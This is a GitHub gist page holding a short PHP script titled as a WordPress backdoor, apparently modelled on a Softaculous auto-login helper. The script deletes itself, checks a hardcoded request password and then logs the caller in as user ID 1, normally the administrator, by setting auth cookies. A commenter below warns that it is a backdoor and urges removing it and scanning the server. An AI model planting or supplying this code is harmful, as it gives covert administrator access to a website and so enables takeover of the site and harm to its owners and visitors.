Created
November 3, 2016 08:59
-
-
Save bi0xid/60803a9cca862888b15d94bf46774fb3 to your computer and use it in GitHub Desktop.
Create a backdoor to WP access (softaculous)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| @unlink(__FILE__); | |
| // Validate if the request is from Softaculous | |
| if($_REQUEST['pass'] != 'mv8gdj4ohqfxpu34yj5ursupfabcmvdm'){ // your password here | |
| die("Unauthorized Access"); | |
| } | |
| require('wp-blog-header.php'); | |
| require('wp-includes/pluggable.php'); | |
| $user_info = get_userdata(1); | |
| // Automatic login // | |
| $username = $user_info->user_login; | |
| $user = get_user_by('login', $username ); | |
| // Redirect URL // | |
| if ( !is_wp_error( $user ) ) | |
| { | |
| wp_clear_auth_cookie(); | |
| wp_set_current_user ( $user->ID ); | |
| wp_set_auth_cookie ( $user->ID ); | |
| $redirect_to = user_admin_url(); | |
| wp_safe_redirect( $redirect_to ); | |
| exit(); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This is a backdoor file to access your root directory.
I will strongly recommend you to install the WordPress manually instead of using this online software.
Don't forget to remove this file from your server and scan your home directory at least once.